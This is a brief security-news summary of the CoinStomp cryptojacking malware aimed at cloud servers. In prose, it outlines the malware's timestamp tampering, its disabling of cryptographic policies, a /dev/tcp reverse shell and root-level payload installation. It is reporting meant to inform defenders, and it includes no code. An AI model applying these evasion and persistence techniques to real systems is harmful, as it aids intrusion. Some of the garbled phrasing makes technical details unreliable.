CoinStomp, a new malware family that mines cryptocurrencies on cloud services, has been discovered. This malware appears to be targeting cloud service providers in Asia at the moment.
The CoinStomp: What is it ?
The findings from CoinStomp are presented below.
CoinStomp provides a number of features, including timestamping, deactivating system-wide cryptographic policies, and employing a /dev/tcp reverse shell to initiate C2 communication.
On Linux systems, the timestamping feature manipulates timestamps using the touch command and a naturally available method of building a reverse shell or C2 communication channel.
Additionally, some evidence of a cryptojacking threat group known as Xanthe has been discovered in code. According to researchers, however, the evidence was insufficient to support this allegation.
Techniques that are anti-forensic
The malware tries to mess with Linux server cryptographic policies to avoid forensic actions against itself.
These restrictions are designed to prevent malicious executables from running. As a result, before engaging in any action, authors use the kill command to disable system-wide cryptographic settings.
Furthermore, any attempt by administrators to reverse that operation ensures that the malware fulfils its objectives.
CoinStomp uses a reverse shell to connect to its C2 server in the next stage. Additional payloads are then downloaded and executed as system-wide system services with root capabilities by the script.
Binaries for creating backdoors and a bespoke version of XMRig could be included in these payloads.
Conclusion
To undermine Linux security, the attackers are eliminating cryptographic policies. The employment of anti-forensic tactics suggests that attackers are also aware of incident response systems. These capabilities demonstrate attackers’ understanding and expertise in terms of cloud security, making it a serious danger.